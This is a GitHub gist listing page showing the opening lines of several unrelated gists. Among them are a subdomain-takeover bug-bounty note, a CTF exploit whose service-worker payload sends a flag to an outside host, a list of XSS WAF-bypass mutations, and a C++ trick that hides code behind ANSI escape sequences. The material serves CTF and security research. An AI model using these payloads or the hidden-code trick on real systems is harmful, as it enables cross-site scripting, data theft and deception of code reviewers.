Skip to content

Instantly share code, notes, and snippets.

View shagunattri's full-sized avatar
🔨

shagun shagunattri

🔨
View GitHub Profile
@TheBinitGhimire
TheBinitGhimire / README.md
Last active May 30, 2024 11:10
Dangling DNS Records leading to Sub-domain Takeover on api.techprep.fb.com!

Dangling DNS Records on api.techprep.fb.com - $500!

Read proper write-up here: https://publish.whoisbinit.me/subdomain-takeover-on-api-techprep-fb-com-through-aws-elastic-beanstalk

I have included my script in another file (main.sh), which I used in discovering this vulnerability.

I didn't do any form of manual work in finding this vulnerability, and my workflow was fully automated with Bash scripting.

I have shortened my actual script, and only included the part which helped me in finding this vulnerability in the main.sh file.

@prologic
prologic / LearnGoIn5mins.md
Last active June 17, 2024 14:24
Learn Go in ~5mins
@po6ix
po6ix / ex.html
Created December 13, 2020 16:20
Amazing notes
<iframe srcdoc="&#x3C;form action=&#x22;https://amazingnotes.asisctf.com:444/&#x22; method=&#x22;POST&#x22; id=x&#x3E;
&#x3C;input name=ext value=es&#x3E;
&#x3C;textarea name=note&#x3E;
self.addEventListener(&#x22;fetch&#x22;, function(event) {
if(event.request.url.indexOf(&#x22;flag&#x22;) != -1)
return;
event.respondWith(new Response(&#x60;
&#x3C;img src=//p6.is/givemeflag&#x3E;
<script>
/* So how does this work?
I'm using ANSI escape sequences to control the behavior of the terminal while
cat is outputting the text. I deliberately place these control sequences inside
comments so the C++ compiler doesn't try to treat them as code.*/
//
/*The commands in the fake code comment move the cursor to the left edge and
clear out the line, allowing the fake code to take the place of the real code.
And this explanation uses similar commands to wipe itself out too. */
//
#include <cstdio>
from __future__ import division, print_function
import random
from pwn import *
import argparse
import time
context.log_level = 'error'
parser = argparse.ArgumentParser()
@hackerscrolls
hackerscrolls / mutation_a.txt
Last active May 27, 2024 22:17
Mutation points in <a> tag for WAF bypass
<a[1]href[2]=[3]"[4]java[5]script:[6]alert(1)">
[1]
Bytes:
\x09 \x0a \x0c \x0d \x20 \x2f
<a/href="javascript:alert(1)">
<a\x09href="javascript:alert(1)">
[2,3]
@onlurking
onlurking / programming-as-theory-building.md
Last active June 5, 2024 04:46
Programming as Theory Building - Peter Naur

Programming as Theory Building

Peter Naur

Peter Naur's classic 1985 essay "Programming as Theory Building" argues that a program is not its source code. A program is a shared mental construct (he uses the word theory) that lives in the minds of the people who work on it. If you lose the people, you lose the program. The code is merely a written representation of the program, and it's lossy, so you can't reconstruct

@cinnamon-msft
cinnamon-msft / settings.json
Created May 21, 2020 12:29
Windows Terminal Build Color Scheme
{
"name": "Build",
"foreground": "#f1f1f1",
"background": "#492D7C",
"cursorColor": "#FFFFFF",
"black": "#0C0C0C",
"red": "#C50F1F",
"green": "#13A10E",
"yellow": "#C19C00",
<TaskerData sr="" dvi="1" tv="5.9.2">
<Profile sr="prof22" ve="2">
<cdate>1568555561584</cdate>
<edate>1569679198184</edate>
<id>22</id>
<mid0>21</mid0>
<nme>Rotate Ad ID</nme>
<Time sr="con0">
<fh>0</fh>
<fm>0</fm>
@atikrahman1
atikrahman1 / TomNomNom_Q&A_INTIGRITI.txt
Created May 8, 2020 18:09
LIVE MENTOR SESSION: @tomnomnom . I have collected all of the the question and answer in comments section for my later read.
INTIGRITI
@intigriti
Red circleLIVE MENTOR SESSION:
@TomNomNom
will answer your #BugBounty and tooling questions for the next 4 hours! Comment with your question!
https://twitter.com/intigriti/status/1258729529859768320
Question from @amalmurali47 :